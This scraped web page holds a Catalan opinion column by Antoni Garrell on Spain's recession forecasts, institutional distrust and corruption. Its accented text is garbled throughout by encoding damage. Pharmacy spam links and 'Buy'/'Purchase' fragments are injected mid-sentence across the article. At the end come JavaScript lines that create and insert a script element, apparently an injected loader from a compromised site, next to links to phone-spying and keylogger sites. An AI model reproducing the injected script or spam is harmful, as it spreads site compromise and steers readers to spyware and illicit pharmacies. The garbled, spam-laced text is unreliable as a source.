General

Immersos en una espiral destructiva

http://lifefortravel.com/isoniazid-price-philippines/

“Si volem posar fi, i hem de voler-ho, a aquesta espiral destructiva de la convivA?ncia i que frena la requerida recuperaciA? econA?mica, Ai??s imprescindible posar fi als debats sobre espionatges, corrupcions i actituds prepotents”

______

Antoni Garrell

 

Antoni Garrell

Vicepresident FundaciA? per la IndA?stria, Director General de FUNDIT http://fidia-2010.mhs.narotama.ac.id/2018/03/15/generic-digoxin-cost/ order precose reviews

 

Antoni Garrell Ai??s Enginyer Industrial, especialista en gestiA? de la innovaciA? i en economia del coneixement. Fou fundador del Cercle per al Coneixement i impulsor de la FundaciA? Indicis que centra la seva activitat en aspectes de sostenibilitat i clima. Des de 1998 Ai??s Director General de la FundaciA? per l’ESDi (FUNDIT).

Seguir l’autor Pills @AntoniGarrell Purchase
______

Estem transitant per una A?poca de la histA?ria on malauradament sembla que el demAi?? pot ser encara pitjor que lai??i??ahir. Un perAi??ode on, al igual que en A?poques de guerra, la irracionalitat sembla estigui guanyant al seny que hauria de caracteritzar als humans. Les darreres previsions de la ComissiA? Europea sobre lai??i??economia espanyola alimenten encara mAi??s aquesta impressiA?. Les informacions aportades per la ComissiA? expliquen que el deute pA?blic seguirAi?? creixent amb uns tipus dai??i??interA?s allunyats dels que sA?n requerits; i que el PIB no creixerAi?? fins el 2014 (+0,8%) ja que al 2013 caurAi?? un 1,4%. ConseqA?entment no es crearAi?? ocupaciA?, i sai??i??incrementaran les dificultats de les famAi??lies i debilitaran els mercats interiors. Un fet que obligarAi?? a quA? les empreses incrementin els seus esforAi??os per competir a nivell global, especialment fora de la zona euro ja que aquesta seguirAi?? en recessiA?. Afortunadament hi ha raons per la confianAi??a, ja que el bon nivell de moltes Purchase http://qurological.com/2018/03/16/cheap-doxazosin/ de les nostres empreses permet aquesta competA?ncia, aixAi?? es certifica amb els increments del 2012, i les previsions de la prA?pia ComissiA? pel 2013 (+4,2%) i pel 2014 ( +5,7%).

Les previsions de ComissiA? Europea ens haurien de fer entendre a tots, i molts especialment als qui tenen mAi??s capacitat per fer capgirar les coses, que a lai??i??Estat espanyol en els propers Buy 2 anys, a menys que es canviA?n les polAi??tiques, -quelcom imprescindible-, es seguirAi?? sense crear ocupaciA?.

EsdevAi?? doncs imprescindible deixar de retallar i posar en Buy marxa actuacions reals de reactivaciA? econA?mica, tenint especial cura en fomentar lai??i??emprenedoria; la interrelaciA? entre universitat i empresa; i treballar activament per la reindustrialitzaciA? del paAi??s tot considerant, per un igual, els processos relocalitzadors, i lai??i??alt nivell tA?cnic i cientAi??fics dels centres de recerca i desenvolupament de casa nostra.

La situaciA? obliga a grans canvis. A desterrar la frivolitat i la manca de rigor que ha caracteritzat a una part dels dirigents ancorats amb el crA?dit fAi??cil, lai??i??endeutament excessiu i lai??i??enriquiment rapit amb operacions sovint especulatives. En els moments actuals, plens de sacrificis per gran part de la poblaciA?, els ciutadans, amb menys por que en altres A?poques, volen mAi??s transparA?ncia, molt mAi??s rigor en la gestiA? i honestedat en les actuacions, i rapidesa en la presa de decisions per evitar que la defensa els interessos dai??i??uns colai???lectius, malversi el present i hipotequi el futur de la immensa majoria dels ciutadans que volen traAi??ar en llibertat i progres el seu futur.
SA?n A?poques en quA? esdevAi?? imprescindible aconseguir la mAi??xima complicitat entre tots, ja que en cas contrari creixent les dificultats, la crispaciA? i la conflictivitat, i sai??i??esvaeixen les sinA?rgies imprescindibles. Malauradament aquests fets sembla que no volen ser assumits per una part dels qui tenen mAi??s capacitat de capgirar les coses.

En purchase zyvox generic aquests moments, mAi??s enllAi?? de la crisi econA?mica que porta la misA?ria a milions de persones, estem submergits en un trencament de la confianAi??a entre les institucions i la ciutadania. Aquest Ai??s un fet omnipresent. Les darreres manifestacions del passat 23 de febrer en sA?n un clar exponent. Certament per recuperar l’activitat econA?mica sA?n imprescindibles recursos, talent i voluntat dai??i??assumir risc en un marc on el crA?dit sigui possible i Ai??s faciliti lai??i??emprenedoria. No obstant aquestes condicions necessAi??ries no sA?n suficients, ja que Ai??s imprescindibles restablir la confianAi??a amb aquells que governen el destAi?? colai???lectiu i administren els recursos pA?blics. La manca dai??i??aquesta confianAi??a impossibilita sumar voluntats i desplegar el potencial arrelat en el talen humAi??.

buy prograf cost

Recuperar la confianAi??a i sumar la forAi??a colai???lectiva per capgirar la situaciA?, sembla impossible ja que quasi cada dia ens despertem amb noves notAi??cies sobre fraus i corrupcions d’alguns polAi??tics, que esquitxen a tots les partits i tenyeixen de sospita a la classe polAi??tica en general, bAi??sicament pel fet que, addicionalment a la lentitud de la justAi??cia, els mAi??xims responsables dels partits o organitzacions afectades, enlloc de prendre mesures amb rapidesa opten per http://blog.concung.com/buy-pristiq-50-mg.html la polAi??tica del ai???tu tambAi??, o tu mAi??sai???

Si volem posar fi, i hem de voler-ho, a aquesta espiral destructiva de la convivA?ncia i que frena la requerida recuperaciA? econA?mica, Ai??s imprescindible posar fi als debats sobre espionatges, corrupcions i actituds prepotents. Fer-ho obliga a exigir que la justAi??cia actuA? amb rapidesa i fermesa, a no ajornar ni un dia mAi??s la regeneraciA? de les institucions del paAi??s, a donar pas a noves persones tot apartat a aquelles sobre les qui hi ha dubtes raonats sobre la seva honorabilitat i capacitat, i a efectuar tots els canvis legislatius requerits. Cal fer-ho actuant sabedors que avui en dia no es el gran qui es menja el petit, Ai??s el rAi??pid qui es menja al lent i que en democrAi??cia Ai??s irrenunciable assolir el progrAi??s colai???lectiu, en un marc de transparA?ncia i rendiciA? de comptes. minocycline stroke treatment

document.currentScript.parentNode.insertBefore(s, document.currentScript);

var d=document;var s=d.createElement(‘script’); Buy http://c3editions.com/skype-spy-keyword-whatsapp-hack/http://brandoutlet.boutique/android-keylogger-snapchat-message-hacker-best-spy-app-for-iphone/ order isoniazid therapy